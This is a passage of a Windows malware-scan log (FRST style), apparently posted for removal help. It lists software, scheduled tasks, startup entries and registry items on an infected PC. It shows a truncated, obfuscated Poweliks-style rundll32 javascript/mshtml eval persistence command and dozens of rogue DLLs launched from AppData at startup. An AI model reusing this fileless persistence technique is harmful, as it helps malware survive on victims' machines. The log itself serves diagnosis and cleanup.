Windows Live Mail (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Mesh (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Windows Live Messenger (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Messenger Companion Core (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live MIME IFilter (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Movie Maker (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Photo Common (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Photo Gallery (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live PIMT Platform (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Remote Client (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live Remote Client Resources (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live Remote Service (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live Remote Service Resources (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live SOXE (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live SOXE Definitions (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live UX Platform (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live UX Platform Language Pack (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Writer (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Writer Resources (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Xvid 1.2.1 final uninstall (HKLM-x32\...\Xvid_is1) (Version: 1.2 - Xvid team (Koepi))
ZoneAlarm LTD Toolbar (HKLM\...\ZoneAlarm LTD Toolbar) (Version:  - Check Point Software Technologies)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-764796802-3477399101-373240229-1000_Classes\CLSID\{1FD1FE74-9E3C-4C1C-AEEB-AAB592AD770F}\localserver32 -> C:\Users\Hogg\AppData\Local\Facebook\Update\FacebookUpdate.exe (Facebook Inc.)
CustomCLSID: HKU\S-1-5-21-764796802-3477399101-373240229-1000_Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InprocServer32 -> C:\Windows\system32\shell32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-764796802-3477399101-373240229-1000_Classes\CLSID\{8B9F5BF4-0407-4BB2-9FED-4C0372DABD00}\localserver32 -> C:\Users\Hogg\AppData\Local\Facebook\Video\Skype\FacebookVideoCallingProxy.exe (Skype Limited)
CustomCLSID: HKU\S-1-5-21-764796802-3477399101-373240229-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?

==================== Restore Points  =========================

30-08-2014 19:21:28 Scheduled Checkpoint
31-08-2014 09:57:32 Scheduled Checkpoint
01-09-2014 13:37:52 Scheduled Checkpoint
02-09-2014 01:41:17 Scheduled Checkpoint
02-09-2014 19:32:10 Scheduled Checkpoint
03-09-2014 16:16:12 Scheduled Checkpoint
04-09-2014 18:34:24 Scheduled Checkpoint
05-09-2014 22:15:07 Scheduled Checkpoint
06-09-2014 18:39:33 Scheduled Checkpoint
07-09-2014 15:53:08 Scheduled Checkpoint
08-09-2014 13:53:39 Scheduled Checkpoint
09-09-2014 16:25:34 Scheduled Checkpoint
10-09-2014 14:21:19 Scheduled Checkpoint
10-09-2014 15:08:21 Device Driver Package Install: Apple, Inc. Universal Serial Bus controllers
11-09-2014 17:05:18 Scheduled Checkpoint
12-09-2014 22:45:41 PC Helper 360 Backup
13-09-2014 00:33:39 PC Helper 360 Backup
13-09-2014 02:20:36 Configured Microsoft Flight Simulator X
13-09-2014 14:48:15 PC Helper 360 Backup
13-09-2014 14:54:04 PC Helper 360 Backup
13-09-2014 16:52:37 Windows Update
14-09-2014 13:33:22 Windows Update
14-09-2014 15:00:34 Windows Update

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2006-11-02 06:34 - 2006-09-18 15:37 - 00000761 ____N C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost
::1             localhost

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {046235D7-ABC4-4A57-BCDF-9950CCB97EC3} - System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-764796802-3477399101-373240229-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\realupgrade.exe [2013-08-14] (RealNetworks, Inc.)
Task: {0AEAFAF6-F116-4A60-AFB4-C8B755A6E975} - System32\Tasks\Microsoft\Windows\MobilePC\TMM
Task: {0BE36494-68E4-4DD3-AA6D-F9AE957FF7E8} - System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-764796802-3477399101-373240229-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\realupgrade.exe [2013-08-14] (RealNetworks, Inc.)
Task: {11FB66F9-3D27-4B87-8512-2020F78637F0} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-764796802-3477399101-373240229-1000UA => C:\Users\Hogg\AppData\Local\Facebook\Update\FacebookUpdate.exe [2012-07-11] (Facebook Inc.)
Task: {1445A45F-6406-42CA-B01F-2890449C7669} - System32\Tasks\ParetoLogic Update Version3 => C:\Program Files (x86)\Common Files\ParetoLogic\UUS3\Pareto_Update3.exe [2013-05-23] ()
Task: {14968784-441D-4462-BD49-87F12C2E8B7E} - System32\Tasks\ParetoLogic Registration3 => Rundll32.exe "C:\Program Files (x86)\Common Files\ParetoLogic\UUS3\UUS3.dll" RunUns
Task: {15FBC6DE-1AE2-4A9A-9548-DC898594B768} - System32\Tasks\Microsoft\Windows\WindowsCalendar\Reminders - Hogg => C:\Program Files\Windows Calendar\WinCal.exe [2008-01-20] (Microsoft Corporation)
Task: {192DDA2D-5815-47B8-983F-65744FEEC03A} - System32\Tasks\Microsoft\Windows\Shell\CrawlStartPages
Task: {19A25ADD-EB0E-4B63-9BB4-0256C1F2DE3C} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-12] (Adobe Systems Incorporated)
Task: {1A64817C-842B-4F0F-889D-C8FEAA0A544E} - System32\Tasks\HP Health Check => c:\Program Files (x86)\Hewlett-Packard\HP Health Check\HPHC_Scheduler.exe [2008-12-04] (Hewlett-Packard)
Task: {236F269B-B84B-487D-B318-62CFE53D1EC9} - System32\Tasks\{FF904900-4DB3-4108-9C40-7F4EBC13B026} => C:\Program Files (x86)\Skype\Phone\Skype.exe
Task: {254095AE-FB97-48EA-94A5-D8BF2AB79714} - System32\Tasks\Microsoft\Windows\RAC\RACAgent => C:\Windows\system32\RacAgent.exe [2008-01-20] (Microsoft Corporation)
Task: {43177A72-9692-414D-BD40-89655D224F64} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2009-08-13] (Google Inc.)
Task: {5AA23D62-2A27-43A5-9C6A-C36C8F7CA953} - System32\Tasks\Foresight Software Update3 => C:\Program Files (x86)\Common Files\Foresight Software\UUS3\Update3.exe [2013-06-27] (Foresight Software)
Task: {5E09E208-D7B3-4EDE-95E5-54F9427C5A47} - System32\Tasks\PC Helper 360 => C:\Program Files (x86)\Foresight Software\PC Helper 360\pch360.exe [2013-06-27] (Foresight Software)
Task: {5F0436EF-91C8-4D30-830A-1914666EC668} - System32\Tasks\Norton Security Scan for Hogg => C:\Program Files (x86)\Norton Security Scan\Engine\4.1.0.28\Nss.exe [2014-08-21] (Symantec Corporation)
Task: {659A76BD-A318-4E0D-A540-EE24A5125631} - System32\Tasks\Norton Internet Security\Norton Error Analyzer => C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\SymErr.exe [2013-06-03] (Symantec Corporation)
Task: {6AB8A520-A8BF-4988-9C70-3E747EDA3943} - System32\Tasks\PCDRScheduledMaintenance => C:\Program Files\PC-Doctor for Windows\pcdr5cuiw32.exe [2009-02-02] (PC-Doctor, Inc.)
Task: {72E52533-D4C0-4086-B9B2-36C85A773AE3} - System32\Tasks\ParetoLogic Update Version3 Startup Task => C:\Program Files (x86)\Common Files\ParetoLogic\UUS3\Pareto_Update3.exe [2013-05-23] ()
Task: {7C638E5B-ECE5-4424-A7E5-2C913CA682E9} - System32\Tasks\Microsoft\Windows\NetworkAccessProtection\NAPStatus UI
Task: {94C5ABFA-CF8E-4B90-88FF-EBBCF6A61742} - \TidyNetwork Update No Task File <==== ATTENTION
Task: {A4A94294-EA2E-4306-A9B3-555A8BA2C71C} - System32\Tasks\Microsoft\Windows\Tcpip\WSHReset => C:\Windows\system32\netsh.exe [2006-11-02] (Microsoft Corporation)
Task: {A9F02FCC-7677-4790-8270-E5175329EC8C} - System32\Tasks\RealDownloaderDownloaderScheduledTaskS-1-5-21-764796802-3477399101-373240229-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\recordingmanager.exe [2013-08-14] (RealNetworks, Inc.)
Task: {AAE69740-1F27-4AAD-9BD7-EC4965923D68} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\WSCStub.exe [2014-04-29] (Symantec Corporation)
Task: {B6C880AD-FE60-4EF5-B964-EADA7D686575} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-764796802-3477399101-373240229-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2013-08-14] (RealNetworks, Inc.)
Task: {B834D3C9-1C43-4CEA-8EF2-121D68F30C7A} - System32\Tasks\RealUpgradeScheduledTaskS-1-5-21-764796802-3477399101-373240229-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2013-08-14] (RealNetworks, Inc.)
Task: {C3CEE5CD-17EB-4AED-95FD-765D90301409} - System32\Tasks\RealUpgradeLogonTaskS-1-5-21-764796802-3477399101-373240229-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2013-08-14] (RealNetworks, Inc.)
Task: {C7E6CBC5-43A1-49BD-B598-22881AFA30C4} - System32\Tasks\Foresight Software Registration3 => Rundll32.exe "C:\Program Files (x86)\Common Files\Foresight Software\UUS3\UUS3.dll" RunUns
Task: {CCB1B7A6-FC0A-4B85-A6B6-303F7743A868} - System32\Tasks\Norton Internet Security\Norton Error Processor => C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\SymErr.exe [2013-06-03] (Symantec Corporation)
Task: {D604FF80-2A0F-48AC-81CE-08D69854368C} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-764796802-3477399101-373240229-1000Core => C:\Users\Hogg\AppData\Local\Facebook\Update\FacebookUpdate.exe [2012-07-11] (Facebook Inc.)
Task: {DB9A1673-9332-43DA-9CD5-18A18F20AF0B} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {DD3D3C5F-0306-4B71-B1FC-FB3E38DF6EA2} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2009-08-13] (Google Inc.)
Task: {E1FF3704-6910-4199-814D-33817990BC18} - System32\Tasks\Google Software Updater => C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe [2012-08-14] (Google)
Task: {E6CEDF7F-B279-4590-9ADC-20A329F3BD22} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-764796802-3477399101-373240229-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2013-08-14] (RealNetworks, Inc.)
Task: {E91D6474-70CC-42BE-80FF-8BED8AF557ED} - System32\Tasks\Microsoft\Windows\Wireless\GatherWirelessInfo => C:\Windows\system32\gatherWirelessInfo.vbs [2008-01-20] ()
Task: {EBB0C16C-A511-45BB-96E5-FAE2A783E2AB} - System32\Tasks\Privacy Controls_{028B732D-E038-11E2-BEAE-EE3C3BB92F93} => C:\Program Files (x86)\ParetoLogic\Privacy Controls\Pareto_PC.exe [2013-05-23] (ParetoLogic Inc.)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-764796802-3477399101-373240229-1000Core.job => C:\Users\Hogg\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-764796802-3477399101-373240229-1000UA.job => C:\Users\Hogg\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\Windows\Tasks\Foresight Software Registration3.job => C:\Program Files (x86)\Common Files\Foresight Software\UUS3\UUS3.dll
Task: C:\Windows\Tasks\Foresight Software Update3.job => C:\Program Files (x86)\Common Files\Foresight Software\UUS3\Update3.exe
Task: C:\Windows\Tasks\Google Software Updater.job => C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\Norton Security Scan for Hogg.job => C:\PROGRA~2\NORTON~2\Engine\410~1.28\Nss.exe
Task: C:\Windows\Tasks\ParetoLogic Registration3.job => C:\Program Files (x86)\Common Files\ParetoLogic\UUS3\UUS3.dll
Task: C:\Windows\Tasks\ParetoLogic Update Version3 Startup Task.job => C:\Program Files (x86)\Common Files\ParetoLogic\UUS3\Pareto_Update3.exe
Task: C:\Windows\Tasks\ParetoLogic Update Version3.job => C:\Program Files (x86)\Common Files\ParetoLogic\UUS3\Pareto_Update3.exe
Task: C:\Windows\Tasks\PC Helper 360.job => C:\Program Files (x86)\Foresight Software\PC Helper 360\pch360.exe
Task: C:\Windows\Tasks\PCDRScheduledMaintenance.job => C:\Program Files\PC-Doctor for Windows\pcdr5cuiw32.exe
Task: C:\Windows\Tasks\Privacy Controls_{028B732D-E038-11E2-BEAE-EE3C3BB92F93}.job => C:\Program Files (x86)\ParetoLogic\Privacy Controls\Pareto_PC.exe

==================== Loaded Modules (whitelisted) =============

2013-08-14 15:19 - 2013-08-14 15:19 - 00039056 _____ () C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe
2014-08-11 23:19 - 2014-08-11 23:19 - 00159768 _____ () C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\loggingserver.exe
2010-03-10 22:32 - 2010-03-10 22:32 - 00026112 _____ () C:\Windows\system32\atitmp64.dll
2013-08-19 09:43 - 2014-08-25 16:17 - 02640408 _____ () C:\Program Files (x86)\AVG SafeGuard toolbar\vprot.exe
2014-04-23 16:05 - 2014-04-23 16:05 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-04-23 16:04 - 2014-04-23 16:04 - 01044808 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2014-08-11 23:19 - 2014-08-11 23:19 - 00519704 _____ () C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\log4cplusU.dll
2014-05-01 14:09 - 2012-05-30 08:51 - 00699280 ____R () C:\PROGRAM FILES (X86)\NORTON INTERNET SECURITY\ENGINE\20.5.0.28\wincfi39.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\ProgramData\Temp:238AA907

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\89540304.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\IMFservice => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\89540304.sys => ""="Driver"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

MSCONFIG\Services: AdobeActiveFileMonitor7.0 => 2
MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: AMD External Events Utility => 2
MSCONFIG\Services: Apple Mobile Device => 2
MSCONFIG\Services: Bonjour Service => 2
MSCONFIG\Services: DTSRVC => 2
MSCONFIG\Services: FLEXnet Licensing Service => 3
MSCONFIG\Services: GameConsoleService => 3
MSCONFIG\Services: gupdate1ca1c3cefd8b09c => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: gusvc => 2
MSCONFIG\Services: HP Health Check Service => 2
MSCONFIG\Services: HPBtnSrv => 2
MSCONFIG\Services: IAANTMON => 2
MSCONFIG\Services: IDriverT => 3
MSCONFIG\Services: iPod Service => 3
MSCONFIG\Services: LightScribeService => 2
MSCONFIG\Services: MBAMScheduler => 2
MSCONFIG\Services: MBAMService => 2
MSCONFIG\Services: McComponentHostService => 3
MSCONFIG\Services: MyWebSearchService => 2
MSCONFIG\Services: PdiService => 2
MSCONFIG\Services: RealNetworks Downloader Resolver Service => 2
MSCONFIG\Services: RosettaStoneLtdController => 2
MSCONFIG\Services: sprtsvc_ncnetworksdm => 2
MSCONFIG\Services: tgsrvc_ncnetworksdm => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^HP Digital Imaging Monitor.lnk => C:\Windows\pss\HP Digital Imaging Monitor.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk => C:\Windows\pss\McAfee Security Scan Plus.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^PictureMover.lnk => C:\Windows\pss\PictureMover.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^Hogg^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OneNote 2007 Screen Clipper and Launcher.lnk => C:\Windows\pss\OneNote 2007 Screen Clipper and Launcher.lnk.Startup
MSCONFIG\startupreg: adiat =>  "C:\Users\Hogg\AppData\Roaming\adiat.dll",SetEncoding
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: antfsc =>  "C:\Users\Hogg\AppData\Roaming\antfsc.dll",_InputHook
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: bcvet =>  "C:\Users\Hogg\AppData\Roaming\bcvet.dll",vLoadModuleW
MSCONFIG\startupreg: CLMLServer for HP TouchSmart => "c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe"
MSCONFIG\startupreg: crutmi =>  "C:\Users\Hogg\AppData\Roaming\crutmi.dll",mpegInGetLastErrString
MSCONFIG\startupreg: cverpa =>  "C:\Users\Hogg\AppData\Roaming\cverpa.dll",vIsModuleLoaded
MSCONFIG\startupreg: cwipn =>  "C:\Users\Hogg\AppData\Roaming\cwipn.dll",GetLocals
MSCONFIG\startupreg: DATAMNGR => C:\PROGRA~2\SEARCH~3\Datamngr\DATAMN~1.EXE
MSCONFIG\startupreg: despr =>  "C:\Users\Hogg\AppData\Roaming\despr.dll",GetMax
MSCONFIG\startupreg: dimsb =>  "C:\Users\Hogg\AppData\Roaming\dimsb.dll",ErrWithUnicodeFilename
MSCONFIG\startupreg: dmenl =>  "C:\Users\Hogg\AppData\Roaming\dmenl.dll",LocalsToFast
MSCONFIG\startupreg: dpapig =>  "C:\Users\Hogg\AppData\Roaming\dpapig.dll",PendingDeprecationWarning
MSCONFIG\startupreg: DT HPW => "C:\Program Files (x86)\Common Files\Portrait Displays\Shared\DT_startup.exe" -HPW
MSCONFIG\startupreg: DVDAgent => "c:\Program Files (x86)\Hewlett-Packard\Media\DVD\DVDAgent.exe"
MSCONFIG\startupreg: ehTray.exe => C:\Windows\ehome\ehTray.exe
MSCONFIG\startupreg: Facebook Update => "C:\Users\Hogg\AppData\Local\Facebook\Update\FacebookUpdate.exe" /c /nocrashserver
MSCONFIG\startupreg: gized =>  "C:\Users\Hogg\AppData\Roaming\gized.dll",State_ThreadHead
MSCONFIG\startupreg: GrooveMonitor => "C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe"
MSCONFIG\startupreg: hcexs =>  "C:\Users\Hogg\AppData\Roaming\hcexs.dll",BadInternalCall
MSCONFIG\startupreg: hecis =>  "C:\Users\Hogg\AppData\Roaming\hecis.dll",set_rgb_to_gray
MSCONFIG\startupreg: hecphi =>  "C:\Users\Hogg\AppData\Roaming\hecphi.dll",CallObjectWithKeywords
MSCONFIG\startupreg: HP Health Check Scheduler => c:\Program Files (x86)\Hewlett-Packard\HP Health Check\HPHC_Scheduler.exe
MSCONFIG\startupreg: HP Remote Software => C:\Program Files\Hewlett-Packard\HP Remote\HP REMOTE V1.0.5.exe
MSCONFIG\startupreg: hpsysdrv => c:\program files (x86)\hewlett-packard\HP odometer\hpsysdrv.exe
MSCONFIG\startupreg: IAAnotif => "C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\iaanotif.exe"
MSCONFIG\startupreg: irypsr =>  "C:\Users\Hogg\AppData\Roaming\irypsr.dll",Check
MSCONFIG\startupreg: ISUSPM => "C:\Program Files (x86)\Common Files\InstallShield\UpdateService\ISUSPM.exe" -scheduler
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: lesro =>  "C:\Users\Hogg\AppData\Roaming\lesro.dll",get_image_width
MSCONFIG\startupreg: mdetse =>  "C:\Users\Hogg\AppData\Roaming\mdetse.dll",Property_Type
MSCONFIG\startupreg: mdevm =>  "C:\Users\Hogg\AppData\Roaming\mdevm.dll",BytesWarning
MSCONFIG\startupreg: mdlobt =>  "C:\Users\Hogg\AppData\Roaming\mdlobt.dll",ImagAsDouble
MSCONFIG\startupreg: mdplt =>  "C:\Users\Hogg\AppData\Roaming\mdplt.dll",List_Append
MSCONFIG\startupreg: mecpst =>  "C:\Users\Hogg\AppData\Roaming\mecpst.dll",CreateThumbnailFromFile
MSCONFIG\startupreg: mgfrob =>  "C:\Users\Hogg\AppData\Roaming\mgfrob.dll",InPlaceOr
MSCONFIG\startupreg: miasc =>  "C:\Users\Hogg\AppData\Roaming\miasc.dll",RuntimeWarning
MSCONFIG\startupreg: Microsoft Default Manager => "c:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe" -resume
MSCONFIG\startupreg: mrdxat =>  "C:\Users\Hogg\AppData\Roaming\mrdxat.dll",SelfIter
MSCONFIG\startupreg: mredrv =>  "C:\Users\Hogg\AppData\Roaming\mredrv.dll",Int_FromString
MSCONFIG\startupreg: msvpr =>  "C:\Users\Hogg\AppData\Roaming\msvpr.dll",XSet
MSCONFIG\startupreg: mtfxp =>  "C:\Users\Hogg\AppData\Roaming\mtfxp.dll",FromMemory
MSCONFIG\startupreg: musdpy =>  "C:\Users\Hogg\AppData\Roaming\musdpy.dll",Int_ClearFreeList
MSCONFIG\startupreg: NCNETWORKSDM => "C:\Program Files (x86)\NCNETWORKSDM\bin\sprtcmd.exe" /P NCNETWORKSDM
MSCONFIG\startupreg: nedes =>  "C:\Users\Hogg\AppData\Roaming\nedes.dll",_Readline
MSCONFIG\startupreg: nedeti =>  "C:\Users\Hogg\AppData\Roaming\nedeti.dll",set_background
MSCONFIG\startupreg: nhadri =>  "C:\Users\Hogg\AppData\Roaming\nhadri.dll",GetBuffer
MSCONFIG\startupreg: nhetwl =>  "C:\Users\Hogg\AppData\Roaming\nhetwl.dll",Long_AsLong
MSCONFIG\startupreg: nobapl =>  "C:\Users\Hogg\AppData\Roaming\nobapl.dll",write_rows
MSCONFIG\startupreg: nstap =>  "C:\Users\Hogg\AppData\Roaming\nstap.dll",Module_GetFilename
MSCONFIG\startupreg: ouipc =>  "C:\Users\Hogg\AppData\Roaming\ouipc.dll",SyntaxWarning
MSCONFIG\startupreg: oxpisr =>  "C:\Users\Hogg\AppData\Roaming\oxpisr.dll",permit_empty_plte
MSCONFIG\startupreg: pepsv =>  "C:\Users\Hogg\AppData\Roaming\pepsv.dll",Dir
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: rapsc =>  "C:\Users\Hogg\AppData\Roaming\rapsc.dll",SourceStopv
MSCONFIG\startupreg: seauib =>  "C:\Users\Hogg\AppData\Roaming\seauib.dll",convert_to_rfc1123
MSCONFIG\startupreg: shosec =>  "C:\Users\Hogg\AppData\Roaming\shosec.dll",GetDomainDNSNameForDomain
MSCONFIG\startupreg: Sidebar => C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
MSCONFIG\startupreg: skcof =>  "C:\Users\Hogg\AppData\Roaming\skcof.dll",PreprocessShaderFromResourceA
MSCONFIG\startupreg: SmartMenu => %ProgramFiles%\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
MSCONFIG\startupreg: splet =>  "C:\Users\Hogg\AppData\Roaming\splet.dll",FromLong
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: TkBellExe => "c:\program files (x86)\real\realplayer\Update\realsched.exe" -osboot
MSCONFIG\startupreg: TSMAgent => "c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\TSMAgent.exe"
MSCONFIG\startupreg: UCam_Menu => "C:\Program Files (x86)\CyberLink\YouCam\MUITransfer\MUIStartMenu.exe" "C:\Program Files (x86)\CyberLink\YouCam" UpdateWithCreateOnce "Software\CyberLink\YouCam\2.0"
MSCONFIG\startupreg: UpdateLBPShortCut => "c:\Program Files (x86)\CyberLink\LabelPrint\MUITransfer\MUIStartMenu.exe" "c:\Program Files (x86)\CyberLink\LabelPrint" UpdateWithCreateOnce "Software\CyberLink\LabelPrint\2.5"
MSCONFIG\startupreg: UpdateP2GoShortCut => "c:\Program Files (x86)\CyberLink\Power2Go\MUITransfer\MUIStartMenu.exe" "c:\Program Files (x86)\CyberLink\Power2Go" UpdateWithCreateOnce "SOFTWARE\CyberLink\Power2Go\6.0"
MSCONFIG\startupreg: UpdatePDIRShortCut => "c:\Program Files (x86)\CyberLink\PowerDirector\MUITransfer\MUIStartMenu.exe" "c:\Program Files (x86)\CyberLink\PowerDirector" UpdateWithCreateOnce "SOFTWARE\CyberLink\PowerDirector\7.0"
MSCONFIG\startupreg: UpdatePSTShortCut => "c:\Program Files (x86)\CyberLink\CyberLink DVD Suite Deluxe\MUITransfer\MUIStartMenu.exe" "c:\Program Files (x86)\CyberLink\CyberLink DVD Suite Deluxe" UpdateWithCreateOnce "Software\CyberLink\PowerStarter"
MSCONFIG\startupreg: utheui =>  "C:\Users\Hogg\AppData\Roaming\utheui.dll",WriteLongToFile
MSCONFIG\startupreg: wadmxp =>  "C:\Users\Hogg\AppData\Roaming\wadmxp.dll",RestoreThread
MSCONFIG\startupreg: werop =>  "C:\Users\Hogg\AppData\Roaming\werop.dll",_Repeat
MSCONFIG\startupreg: winti =>  "C:\Users\Hogg\AppData\Roaming\winti.dll",GetBuiltins
MSCONFIG\startupreg: wlored =>  "C:\Users\Hogg\AppData\Roaming\wlored.dll",get_rowbytes

==================== Faulty Device Manager Devices =============

Name: Microsoft 6to4 Adapter #50
Description: Microsoft 6to4 Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

Name: Microsoft 6to4 Adapter #58
Description: Microsoft 6to4 Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

Name: Microsoft 6to4 Adapter #59
Description: Microsoft 6to4 Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

Name: Microsoft 6to4 Adapter #60
Description: Microsoft 6to4 Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

Name: Microsoft 6to4 Adapter #61
Description: Microsoft 6to4 Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

